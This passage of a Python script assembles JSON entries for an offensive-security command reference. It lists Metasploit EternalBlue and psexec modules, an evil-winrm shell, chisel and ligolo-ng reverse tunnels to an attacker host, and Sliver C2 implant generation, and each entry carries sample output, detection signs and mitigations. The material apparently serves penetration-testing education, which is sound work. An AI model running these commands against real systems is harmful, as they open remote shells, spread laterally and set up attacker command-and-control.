["PHP disabled","WAF blocks"],["p0wny-shell","weevely"],
["https://docs.metasploit.com"],
["php","webshell","upload","msfvenom","web"]),
e("searchsploit-find","searchsploit","exploitation",4,L,
"searchsploit apache 2.4.49",
"SearchSploit (Exploit-DB Offline)","Searches local Exploit-DB archive for known exploits — works offline.",
{"apache 2.4.49":"Search terms"},
"Apache HTTP Server 2.4.49 - Path Traversal & RCE | exploits/multiple/remote/50383.sh\nApache 2.4.49/50 - RCE (2) | exploits/multiple/remote/50406.py",
"Find public exploits for identified services — first step after enumeration.",
["exploitdb installed (searchsploit)"],["T1588.005"],"Resource Development",
["N/A — offline search"],["Patch vulnerable services"],
["No exploits found (0-day needed)"],["exploit-db.com","github search"],
["https://www.exploit-db.com/searchsploit"],
["searchsploit","exploit-db","offline","search","exploits"]),
e("metasploit-eternalblue","metasploit","exploitation",4,L,
"use exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS <target>\nset LHOST <attacker>\nexploit",
"EternalBlue (MS17-010)","Exploits SMBv1 vulnerability for remote code execution — still common in internal networks.",
{"RHOSTS":"Target","LHOST":"Attacker for reverse shell"},
"[*] Sending exploit packet...\n[*] Triggering free of pool chunk...\n[+] Meterpreter session 1 opened",
"Exploit unpatched Windows systems via SMB — very reliable on Windows 7/2008.",
["Target running unpatched SMBv1","Metasploit"],["T1210"],"Lateral Movement",
["SMBv1 traffic","Unusual kernel pool operations"],
["Patch MS17-010","Disable SMBv1","Network segmentation"],
["Already patched","SMBv1 disabled"],["manual exploit","AutoBlue"],
["https://docs.metasploit.com"],
["eternalblue","ms17-010","smb","rce","windows"]),
e("metasploit-psexec","metasploit","exploitation",4,L,
"use exploit/windows/smb/psexec\nset RHOSTS <target>\nset SMBUser admin\nset SMBPass Password1!\nexploit",
"PsExec via Metasploit","Executes payload on remote Windows system using valid credentials — lateral movement.",
{"SMBUser":"Username","SMBPass":"Password or NTLM hash"},
"[*] Connecting to target...\n[*] Uploading payload...\n[+] Meterpreter session 2 opened",
"Move laterally using captured credentials — requires local admin on target.",
["Valid credentials","SMB accessible","Local admin on target"],["T1021.002"],"Lateral Movement",
["Service creation (Event 7045)","SMB file write","Process creation"],
["Restrict local admin","Enable SMB signing","EDR"],
["Not local admin on target"],["impacket-psexec","wmiexec","smbexec"],
["https://docs.metasploit.com"],
["psexec","lateral-movement","smb","credentials","admin"]),
e("evil-winrm-shell","evil-winrm","exploitation",4,L,
"evil-winrm -i <target> -u admin -p 'Password1!'",
"Evil-WinRM Shell","Gets interactive PowerShell shell via WinRM — supports file transfer and DLL loading.",
{"-i":"Target IP","-u":"Username","-p":"Password"},
"*Evil-WinRM* PS C:\\Users\\admin\\Documents>",
"Interactive PowerShell access via WinRM — great for post-exploitation.",
["WinRM enabled (5985/5986)","Valid credentials"],["T1021.006"],"Lateral Movement",
["WinRM connections (Event 4624 type 3)","PowerShell logging"],
["Restrict WinRM access","Enable PowerShell logging"],
["WinRM not enabled"],["Enter-PSSession","winrs"],
["https://github.com/Hackplayers/evil-winrm"],
["evil-winrm","winrm","powershell","shell","lateral"]),
e("chisel-tunnel","chisel","exploitation",5,LW,
"# Attacker: chisel server -p 8080 --reverse\n# Target: chisel client <attacker>:8080 R:9050:socks",
"Chisel SOCKS Tunnel","Creates SOCKS proxy through compromised host — pivots into internal networks.",
{"server":"Run on attacker","client":"Run on target","R:9050:socks":"Reverse SOCKS proxy"},
"server: Listening on 0.0.0.0:8080\nclient: Connected to attacker\nserver: session#1: tun0 (SOCKS)",
"Pivot into internal networks through a compromised host.",
["Chisel binary on both machines","Outbound connectivity from target"],["T1572"],"Command and Control",
["Unusual outbound connections","SOCKS traffic patterns"],
["Egress filtering","Application-layer inspection"],
["No outbound connectivity"],["ligolo-ng","ssh -D","proxychains"],
["https://github.com/jpillora/chisel"],
["chisel","tunnel","socks","pivot","proxy"]),
e("ligolo-tunnel","ligolo-ng","exploitation",5,LW,
"# Attacker: ligolo-proxy -selfcert\n# Target: ligolo-agent -connect <attacker>:11601 -ignore-cert",
"Ligolo-ng Network Pivot","Creates TUN interface for seamless network pivoting — no SOCKS proxy needed.",
{"ligolo-proxy":"Run on attacker","ligolo-agent":"Run on target"},
"[+] Agent joined: target@10.0.0.5\n[+] Tunnel started on interface ligolo\n# Now access internal network directly",
"Seamless pivoting — access internal network as if directly connected (no proxychains needed).",
["Ligolo binaries","Outbound from target"],["T1572"],"Command and Control",
["Unusual outbound connections","TUN interface creation"],
["Egress filtering","Network monitoring"],
["No outbound connectivity"],["chisel","ssh tunneling","sshuttle"],
["https://github.com/nicocha30/ligolo-ng"],
["ligolo","pivot","tunnel","seamless","tun"]),
e("sliver-c2","sliver","exploitation",4,L,
"# Generate implant:\nsliver > generate --mtls <attacker> --os windows --arch amd64 --save implant.exe\n# Start listener:\nsliver > mtls -l 8888",
"Sliver C2 Framework","Modern open-source C2 framework — alternative to Cobalt Strike with evasion features.",
{"generate":"Create implant","--mtls":"Mutual TLS C2","--os":"Target OS"},
"[*] Generating new windows/amd64 implant...\n[*] Build completed: implant.exe (8.2 MB)\n[*] mTLS listener started on 0.0.0.0:8888",
"Full C2 framework for managing compromised hosts — supports multiple protocols.",
["Sliver installed","Network connectivity"],["T1071"],"Command and Control",
["Unusual TLS connections","Beaconing patterns","Large binary execution"],
["EDR","Network monitoring","TLS inspection"],
["EDR detects implant"],["Cobalt Strike","Havoc","Mythic"],
["https://github.com/BishopFox/sliver"],
["sliver","c2","framework","implant","mtls"]),
]

def save(fn,data):
    path=OUTPUT_DIR/fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__=="__main__":
    print("Batch 9 — expanding thin categories...")
    save("bulk9_wireless.json",WIRELESS9)
    save("bulk9_password.json",PASS9)
    save("bulk9_vuln.json",VULN9)
    save("bulk9_exploit.json",EXPLOIT9)
    total=0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total+=len(json.load(fp))
    print(f"\nTOTAL: {total}")
